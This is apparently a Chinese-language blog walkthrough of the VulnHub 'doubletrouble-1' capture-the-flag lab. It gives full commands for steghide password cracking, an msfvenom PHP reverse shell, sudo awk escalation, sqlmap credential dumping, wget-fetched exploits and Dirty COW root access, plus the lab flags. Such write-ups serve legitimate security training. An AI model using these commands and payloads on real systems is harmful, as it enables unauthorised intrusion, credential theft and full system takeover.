『vulnhub系列』doubletrouble-1
下载地址
https://www.vulnhub.com/entry/doubletrouble-1,743/
信息搜集
使用命令,获得存活靶机IP为138,开启端口22和80
nmap 192.168.0.* #因为当前NAT模式,攻击机和靶机在一个内网环境中
访问80的web服务,是一个登录页面
又是qdPm,之前做过一个qdpm的题目,于是我们就知道了qdpm存在密码泄露漏洞。我们来看一下
searchsploit qdpm
我们发现密码泄露漏洞是50176.txt,查看,发现我们可以去http://<website>/core/config/databases.yml 这个目录下,获得数据库的用户名密码
searchsploit -m 50176.txt #将50176.txt存到当前目录
cat 50176.txt
访问后,得到用户名:密码— otis :rush
但我们发现,靶机的3306端口并没有开,继续信息搜集
使用dirsearch爆破目录,得到如下目录,发现secret目录
dirsearch -u "http://192.168.0.138/"
访问/secret目录里面都有一个doubletrouble.jpg
打开图片,发现图片里有我们刚刚获取的用户名和密码Otis:Rush
但目前这些信息并没有什么用,因此想到了以前做CTF时候的隐写术,丢到WinHex里并没有发现什么东西,我们搜索jpg相关的隐写术,发现有一种steghide隐写,可以在linux中使用。
Steghide 是一个可用于隐写术的工具。它允许您在音频和图像文件中嵌入秘密信息,包括 JPEG、BMP、WAV 和 AU 文件。 Steghide 允许:
- 嵌入数据的加密。
- 嵌入数据的压缩。
- 嵌入校验和以验证提取的数据的完整性。
我们安装一下,并试一下,发现需要密码
apt-get install steghide #安装
steghide info doubletrouble.jpg #查看图片信息
然后StegHide是隐写工具,现在我们是要破解它隐写后的密码,这里用到了另一个工具:Stegseek
Stegseek是迄今为止全世界最快的Steghide破解qi,该工具每秒能够处理数百万的密码。虽然Stegseek是一款轻量级工具,但丝毫不影响其功能性的强大。该工具作为原始Steghide项目的一个分支而构建,它的速度比其他破解qi快上千倍。在该工具的帮助下,广大研究人员可以轻松从使用了Steghide隐写&加密的文件中提取出隐藏的数据。
除此之外,Stegseek还可以用来提取Steghide的元数据,我们可以利用这些信息来判断一个文件中是否包含了Steghide数据。
值得一提的是,仅需两秒钟,该工具就可以跑完rockyou.txt字典。而众所周知,rockyou.txt是一个包含了超过1400万个密码的强大字典文件。
apt install stegseek
然后我们使用/usr/share/wordlist/rockyou.txt.gz 解压后的rockyou.txt来进行暴力破解
得到密码92camaro
stegseek doubletrouble.jpg rockyou.txt
再次查看图片信息,输入密码,发现有一个creds.txt
steghide info doubletrouble.jpg
分离文件,输入密码,得到creds.txt 查看一下,得到邮箱:密码[email protected]:otis666
steghide extract -sf doubletrouble.jpg
cat creds.txt
登录成功
漏洞利用
我们发现可以上传文件
我们使用msf生成一个php反弹木马,上传
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.130 lport=4444 -o re_shell.php
上传成功
我们使用msf进行监听,设置options与生成的木马一一对应
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.130
set lport 4444
然后我们刚刚扫描的时候,发现有一个uploads目录,我们访问一下其下的目录attachments
发现我们刚上传的文件已经上传成功了
我们在攻击机输入run开启监听
访问php文件,反弹成功
现在的权限是网站权限
权限提升:
使用py获取交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
使用命令查看带有SUID权限的文件,发现并没有什么东西
find / -perm -u=s -type f 2>/dev/null
使用命令查看可以使用root权限执行的命令,发现awk命令可以以root权限执行
sudo -l
因此我们可以借助awk进行sudo提权
sudo awk 'BEGIN{system("/bin/bash")}'
关于sudo提权可以看我之前的文章sudo滥用提权 | Don_Joshua's Blog (jo4hua.github.io)
提权成功
进入到root目录……发现……还有一个靶机,将其移动到/var/www/html目录下
输入网址+镜像名,下载,开机
http://192.168.0.138/doubletrouble.ova
第二层靶机
信息搜集:
依旧使用nmap找到存活主机
访问80端口web服务,是一个登录页面
使用之前的otis用户名和密码,登陆失败,没有回显,可能是sql注入?使用sqlmap尝试一下吧
漏洞利用:
首先查看源代码,用的是post方式传uname,psw
使用sqlmap,存在时间盲注
sqlmap -u http://192.168.0.139/index.php --data="uname=admin&psw=123"
使用命令,得到数据库doubletrouble 另一个是默认表
sqlmap -u http://192.168.0.139/index.php --data="uname=admin&psw=123" --dbs --batch
继续爆破表
sqlmap -u http://192.168.0.139/index.php --data="uname=admin&psw=123" -D doubletrouble --tables --batch
爆破字段
sqlmap -u http://192.168.0.139/index.php --data="uname=admin&psw=123" -D doubletrouble -T users --columns --batch
爆破内容,得到用户名密码montreux | GfsZxc1 clapton | ZubZub99
sqlmap -u http://192.168.0.139/index.php --data="uname=admin&psw=123" -D doubletrouble -T users -C username,password --dump --batch
然后我们登录,发现登录不上,那现在只剩一个地方了
没错就是ssh了,使用第二个用户和密码登陆成功,获得普通用户权限
ssh [email protected]
权限提升:
老套路,先查看具有SUID权限的文件,发现一个exim4有些可疑
find / -perm -u=s -type f 2>/dev/null
搜一下,发现可以进行SUID提权,使用命令查看一下版本
/usr/sbin/exim4 --version
寻找对应版本漏洞,下载
searchsploit Exim 4.80
searchsploit -m 35951.py
开启apache服务,将exp移动到/var/www/html目录下
service apache2 start
mv 35951.py /var/www/html
使用靶机下载exp
wget http://192.168.0.130/35951.py
发现这几个exp都不好用
接下来查看系统内核信息
uname -a
直接上脏牛提权吧,发现我们的内核版本在可利用范围内
searchspolit dirty
重复上述过程,我们将40847.cpp上传到靶机上,赋予执行权限
wget http://192.168.0.130/40847.cpp #靶机下载exp
chmod +x 40847.cpp #赋予运行权限
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 1 40847.cpp -lutil #编译一下,输出为1
运行1,得到root密码
./1 运行
使用su切换为root用户,输入密码,获取root权限
成果:
获取普通权限的时候,发现user.txt
6CEA7A737C7C651F6DA7669109B5FB52
在root目录下cat root.txt可得
1B8EEA89EA92CECB931E3CC25AA8DE21